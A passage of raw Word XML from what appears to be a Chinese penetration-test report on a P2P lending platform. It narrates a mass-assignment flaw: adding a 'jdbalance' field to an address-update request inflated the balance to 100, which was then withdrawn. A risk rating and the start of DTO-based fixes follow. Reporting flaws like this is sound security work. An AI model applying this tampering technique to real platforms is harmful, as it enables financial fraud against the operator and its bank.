          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00052505" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>在账户余额的首页我们注册了账号进去以后发现余额是</w:t>
      </w:r>
      <w:r w:rsidR="00052505" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00052505" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>元，需要充值才能进行投资理财然后提现。</w:t>
      </w:r>
      <w:r w:rsidR="00052505" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4442D5" w14:textId="77777777" w:rsidR="00D36176" w:rsidRPr="00C15061" w:rsidRDefault="00052505" w:rsidP="000B549D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="95"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BB45A23" wp14:editId="65C34904">
            <wp:extent cx="5543599" cy="1595031"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="111" name="图片 11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5264" cy="1630037"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8A6BBC" w14:textId="77777777" w:rsidR="00D36176" w:rsidRPr="00C15061" w:rsidRDefault="00052505" w:rsidP="00C15061">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>在充值的页面可以同步余额，经过分析发现这个功能就是把平台上的钱和银行里账户的钱同步一致。这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>p2p</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>平台使用的是江西银行来保存客户资金所以最终同步的结果就是江西银行账号的钱和平台的钱一样。经过长期分析发现这个地方不存任何漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00D36176" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>然后继续往下看。</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359D4906" w14:textId="77777777" w:rsidR="00D36176" w:rsidRPr="00C15061" w:rsidRDefault="00052505" w:rsidP="000B549D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="95"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00F2F2F2" wp14:editId="79791811">
            <wp:extent cx="5258435" cy="1419645"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="110" name="图片 110"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4927" cy="1429497"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1CA1F9" w14:textId="77777777" w:rsidR="00D36176" w:rsidRPr="00C15061" w:rsidRDefault="00052505" w:rsidP="00C15061">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>找到了一个用户地址的设置功能。</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2662DBDB" w14:textId="77777777" w:rsidR="00D36176" w:rsidRPr="00C15061" w:rsidRDefault="00052505" w:rsidP="000B549D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="95"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="035ED5B4" wp14:editId="2C1B178A">
            <wp:extent cx="5440468" cy="760095"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="109" name="图片 10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9185" cy="772490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC3F913" w14:textId="77777777" w:rsidR="006620C7" w:rsidRPr="00C15061" w:rsidRDefault="00052505" w:rsidP="00C15061">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>这是从</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>burp response</w:t>
      </w:r>
      <w:r w:rsidR="00D36176" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>回来的数据包，通过对这个数据包的分析，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>发现请求的数据包和返回的数据包参数不一致。换句话说返回的数据包里面参数比请求的数据包多了几个字段其中有</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>字段和</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>jdbalance</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>字段。</w:t>
      </w:r>
      <w:r w:rsidR="00D36176" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>具体的测试操作就是在请求的数据包中</w:t>
      </w:r>
      <w:r w:rsidR="00D36176" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>多出来的字段加入进去然后观察。</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150A5286" w14:textId="77777777" w:rsidR="006620C7" w:rsidRPr="00C15061" w:rsidRDefault="00052505" w:rsidP="000B549D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="95"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68391F2D" wp14:editId="515F4417">
            <wp:extent cx="5498465" cy="1244265"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="108" name="图片 10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839" cy="1246613"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1D9E04" w14:textId="77777777" w:rsidR="006620C7" w:rsidRPr="00C15061" w:rsidRDefault="00052505" w:rsidP="00C15061">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>上面是请求的数据包，用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>截断返回数据包的方式看下返回的数据包</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="726DDCF1" wp14:editId="20F2D68D">
            <wp:extent cx="5375226" cy="1704340"/>
            <wp:effectExtent l="0" t="0" r="10160" b="0"/>
            <wp:docPr id="107" name="图片 10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056" cy="1711579"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4654B275" w14:textId="77777777" w:rsidR="006620C7" w:rsidRPr="00C15061" w:rsidRDefault="00052505" w:rsidP="00C15061">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>返回的金额变成了</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>100.00</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006620C7" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>这个时候并不代表真的达到了数据污染的目的。</w:t>
      </w:r>
      <w:r w:rsidR="006620C7" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r w:rsidR="006620C7" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>去</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>余额</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>账户里面看一下。</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074B6A1E" w14:textId="77777777" w:rsidR="006620C7" w:rsidRPr="00C15061" w:rsidRDefault="00052505" w:rsidP="000B549D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="95"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BC1F119" wp14:editId="453967EC">
            <wp:extent cx="5378663" cy="469506"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="106" name="图片 106"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3866" cy="498766"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AF488D" w14:textId="79E887EF" w:rsidR="00052505" w:rsidRPr="00C15061" w:rsidRDefault="00052505" w:rsidP="00C15061">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>点击刷新以后我们发现余额和总资产已经变成了</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>。后面我们重复了前面开始的操作同步平台上账户里面的钱到银行然后在通过平台成功提现</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADF76DA" w14:textId="3E3F04D6" w:rsidR="0094664F" w:rsidRPr="00C15061" w:rsidRDefault="00C24790" w:rsidP="00C15061">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="0094664F" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="000D277C" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>常见的所有输入的地方都会出现这个漏洞</w:t>
      </w:r>
      <w:r w:rsidR="000D277C" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，攻击者可利用该漏洞</w:t>
      </w:r>
      <w:r w:rsidR="000D277C" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>修改任意用户</w:t>
      </w:r>
      <w:r w:rsidR="000D277C" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidR="000D277C" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="000D277C" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>篡改金额</w:t>
      </w:r>
      <w:r w:rsidR="000D277C" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidR="000D277C" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DF40A5" w14:textId="77777777" w:rsidR="0094664F" w:rsidRPr="00C15061" w:rsidRDefault="0094664F" w:rsidP="00C15061">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1702F80C" w14:textId="1C5F77C1" w:rsidR="003404AA" w:rsidRPr="00C15061" w:rsidRDefault="003404AA" w:rsidP="00C15061">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【高危】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8065B5" w14:textId="3BB32C38" w:rsidR="0094664F" w:rsidRPr="00C15061" w:rsidRDefault="0094664F" w:rsidP="00C15061">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="009075F6" w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议从以下三个方面进行修复：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316AA4EB" w14:textId="762D7AA0" w:rsidR="00F27F34" w:rsidRPr="00C15061" w:rsidRDefault="00F27F34" w:rsidP="00C15061">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15061">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DTO</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8494"/>
      </w:tblGrid>
      <w:tr w:rsidR="009075F6" w:rsidRPr="00C15061" w14:paraId="281D06B9" w14:textId="77777777" w:rsidTr="003920C3">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8621B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public class </w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>companyInfo</w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14C83011"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private String </w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>xxx</w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EE8B3B2"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private String </w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>xxx</w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2042A45C"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rivate </w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>String</w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C15061">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
